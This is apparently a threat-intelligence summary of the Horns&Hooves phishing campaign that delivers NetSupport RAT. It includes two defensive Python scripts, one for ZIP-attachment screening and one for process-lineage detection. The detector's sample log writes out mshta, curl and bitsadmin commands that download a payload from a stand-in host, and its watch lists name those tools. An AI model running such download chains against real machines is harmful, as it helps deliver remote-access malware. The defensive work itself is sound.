December 3, 2024 at 12:51AM
A new malware campaign named Horns&Hooves targets users and businesses in Russia and has infected over 1,000 victims since March 2023. It delivers NetSupport RAT and BurnsRAT through deceptive email attachments, and that access is then used to install additional malware. The campaign is linked to the threat group TA569, known for facilitating ransomware attacks and data theft.
### Meeting Takeaways – Malware / Phishing Attack – December 3, 2024
**Campaign Overview:**
– A new malware campaign, named **Horns&Hooves** by Kaspersky, has primarily targeted individuals and businesses in **Russia** since **March 2023**, impacting over **1,000 victims**.
– The campaign’s objective is to deploy tools such as **NetSupport RAT** and **BurnsRAT**, facilitating the installation of additional stealer malware like **Rhadamanthys** and **Meduza**.
**Attack Vectors and Strategies:**
– Attackers have used **lookalike email attachments** in ZIP archives that contain **JScript scripts**, often disguised as legitimate business communications.
– The campaign shows an evolving **JavaScript payload**, with frequent updates and changes aimed at improving the success rate of the phishing attempts.
– ZIP files sometimes include documents related to the targeted organization to further deceive recipients into executing the malicious files.
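The attachment pattern described above (a ZIP that carries a JScript file next to a decoy document) can be screened at the mail gateway without executing anything. The following is an added example, not code from Kaspersky or from the original summary; the extension lists, the in-memory sample archive and its file names are constructed for the demonstration, and the `.js` member contains only a placeholder comment.

```python
import io
import zipfile
from typing import Any, Dict

# Extensions Windows treats as directly executable scripts. The campaign's
# lures carried JScript (.js); the remaining entries are conventional
# additions so the filter also covers HTA, VBScript, WSF and batch droppers.
SCRIPT_EXTENSIONS = {".js", ".jse", ".hta", ".vbs", ".vbe", ".wsf", ".wsh", ".bat", ".cmd", ".ps1"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}


def classify_member(name: str) -> str:
    """Return 'directory', 'script', 'archive', 'document' or 'other' for one ZIP entry."""
    leaf = name.lower().rsplit("/", 1)[-1]
    if not leaf:
        return "directory"
    parts = leaf.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in SCRIPT_EXTENSIONS:
        return "script"
    if ext == ".zip":
        return "archive"
    if ext in DOCUMENT_EXTENSIONS:
        return "document"
    return "other"


def has_double_extension(name: str) -> bool:
    """True for names such as 'Invoice.pdf.js': a document suffix shown before the script suffix."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return (len(parts) >= 3
            and "." + parts[-2] in DOCUMENT_EXTENSIONS
            and "." + parts[-1] in SCRIPT_EXTENSIONS)


def screen_zip(data: bytes, depth: int = 0, max_depth: int = 2) -> Dict[str, Any]:
    """Inspect a ZIP attachment held in memory without extracting it to disk.

    Returns the script members found (including inside nested ZIPs up to
    max_depth), the decoy documents that accompany them, and a verdict of
    'allow', 'quarantine' (script content present) or 'reject' (unreadable).
    """
    report = {"scripts": [], "documents": [], "nested": [], "verdict": "allow"}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        report["verdict"] = "reject"  # unreadable archives are not passed through
        return report
    with archive:
        for info in archive.infolist():
            kind = classify_member(info.filename)
            if kind == "script":
                report["scripts"].append(info.filename)
            elif kind == "document":
                report["documents"].append(info.filename)
            elif kind == "archive" and depth < max_depth:
                inner = screen_zip(archive.read(info.filename), depth + 1, max_depth)
                report["nested"].append((info.filename, inner["verdict"]))
                # prefix nested hits with the inner archive name so the path stays traceable
                report["scripts"].extend(f"{info.filename}!{s}" for s in inner["scripts"])
    if report["scripts"]:
        report["verdict"] = "quarantine"
    return report


def build_sample_lure() -> bytes:
    """Constructed sample: a decoy document plus a JScript file with a double extension.

    The script body is a placeholder comment, not executable logic.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Contract_2023.docx", b"constructed decoy document bytes")
        archive.writestr("Invoice_2023.pdf.js", b"// constructed placeholder, no executable logic\n")
    return buf.getvalue()


def build_nested_sample() -> bytes:
    """Constructed sample: the lure above wrapped in an outer ZIP, as some mailers nest archives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as outer:
        outer.writestr("documents.zip", build_sample_lure())
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("flat", build_sample_lure()), ("nested", build_nested_sample())):
        report = screen_zip(sample)
        print(label, report["verdict"], report["scripts"], report["documents"])
```

The check deliberately keys on the member name rather than on content: a decoy `.docx` sitting beside a `.pdf.js` is exactly the shape the summary describes, and quarantining on the presence of any script member is cheaper and more reliable than trying to judge the script body.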
**Technical details:**
– An early campaign sample used an **HTML Application (HTA)** file that, when executed, downloads a fake PNG image and runs scripts via Windows’ built-in **curl** and **BITSAdmin** tools to install NetSupport RAT.
– A mid-May 2023 iteration used JavaScript that mimicked legitimate libraries to trigger the infection chain.
– The malware enables remote interactions over a network, including file transfer, command execution, and desktop management through the **Remote Manipulator System (RMS)**.
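The HTA stage above leaves a distinctive process lineage on the endpoint: a script host (mshta.exe for HTA files, wscript.exe or cscript.exe for JScript) spawning curl.exe or bitsadmin.exe, sometimes through an intermediate cmd.exe. The following detection logic is an added example written for this summary, not Kaspersky's or the original page's code; the Sysmon-style field names, the pids, paths and example.invalid URLs in the sample log are all constructed.

```python
import json
from typing import Dict, List

# Processes that execute HTA/JScript/VBScript lures, and the built-in
# download utilities the early Horns&Hooves sample chained behind them.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_TOOLS = {"curl.exe", "bitsadmin.exe"}

# Constructed process-creation events (Sysmon-style fields, one JSON object per
# line). Paths, pids and the example.invalid URLs are made up for this demo.
SAMPLE_LOG = "\n".join([
    r'{"ts": "2024-12-02T10:00:01Z", "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "parent_image": "C:\\Windows\\System32\\userinit.exe", "cmdline": "explorer.exe"}',
    r'{"ts": "2024-12-02T10:00:05Z", "pid": 150, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe"}',
    r'{"ts": "2024-12-02T10:00:09Z", "pid": 160, "ppid": 150, "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "curl.exe -s https://example.invalid/health"}',
    r'{"ts": "2024-12-02T10:01:00Z", "pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "mshta.exe C:\\Users\\user\\Downloads\\Contract.hta"}',
    r'{"ts": "2024-12-02T10:01:02Z", "pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "curl.exe -o C:\\Users\\Public\\image.png http://example.invalid/image.png"}',
    r'{"ts": "2024-12-02T10:01:03Z", "pid": 400, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "cmd.exe /c run.bat"}',
    r'{"ts": "2024-12-02T10:01:04Z", "pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\bitsadmin.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "bitsadmin.exe /transfer job /download /priority high http://example.invalid/image.png C:\\Users\\Public\\image.png"}',
])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(log_text: str) -> List[Dict[str, object]]:
    """Parse JSON-lines process-creation events, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def ancestor_chain(event: Dict[str, object], index: Dict[object, Dict[str, object]],
                   max_hops: int = 3) -> List[str]:
    """Image names from the event's process up through at most max_hops ancestors.

    Follows pid/ppid links while the parent event is in the batch and falls
    back to the recorded parent_image field when it is not.
    """
    chain = [basename(str(event["image"]))]
    current = event
    for _ in range(max_hops):
        parent = index.get(current.get("ppid"))
        if parent is None:
            chain.append(basename(str(current.get("parent_image", ""))))
            break
        chain.append(basename(str(parent["image"])))
        current = parent
    return chain


def detect_script_host_downloads(events: List[Dict[str, object]], max_hops: int = 3) -> List[Dict[str, object]]:
    """Flag curl/bitsadmin launches that descend from a script host.

    Walking several hops catches the 'mshta -> cmd -> bitsadmin' shape as
    well as the direct 'mshta -> curl' one; a single hop would miss the former.
    """
    index = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        tool = basename(str(ev["image"]))
        if tool not in DOWNLOAD_TOOLS:
            continue
        chain = ancestor_chain(ev, index, max_hops)
        hosts = [name for name in chain[1:] if name in SCRIPT_HOSTS]
        if hosts:
            alerts.append({
                "ts": ev["ts"],
                "tool": tool,
                "script_host": hosts[0],
                "chain": " <- ".join(chain),
                "cmdline": ev.get("cmdline", ""),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_script_host_downloads(parse_events(SAMPLE_LOG)):
        print(alert["ts"], alert["chain"])
        print("    ", alert["cmdline"])
```

The curl launched from an interactive PowerShell session in the sample is intentionally left unflagged: the rule keys on the script-host ancestry rather than on curl or bitsadmin alone, which keeps routine administrative use out of the alert queue.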
**Modus Operandi Evolution:**
– Later iterations of the attack used a restructured **BAT file** to install the RAT and embedded the malware directly in the JavaScript code, indicating that the threat actors adapt their tooling over time.
– The campaign is linked to **TA569**, a known threat group associated with prior malware such as **SocGholish (FakeUpdates)** and recognized for facilitating ransomware attacks like **WastedLocker**.
**Potential Impacts:**
– Victim organizations face various risks including **data theft**, **encryption of data**, and overall **system damage**, especially if the access is sold or leveraged by other threat actors.
**Next Steps:**
– Companies should strengthen their email security and cybersecurity awareness training, focusing on recognizing and handling phishing attempts effectively.
– Implementing more robust email filtering systems and malware detection tools could help mitigate risks associated with such campaigns.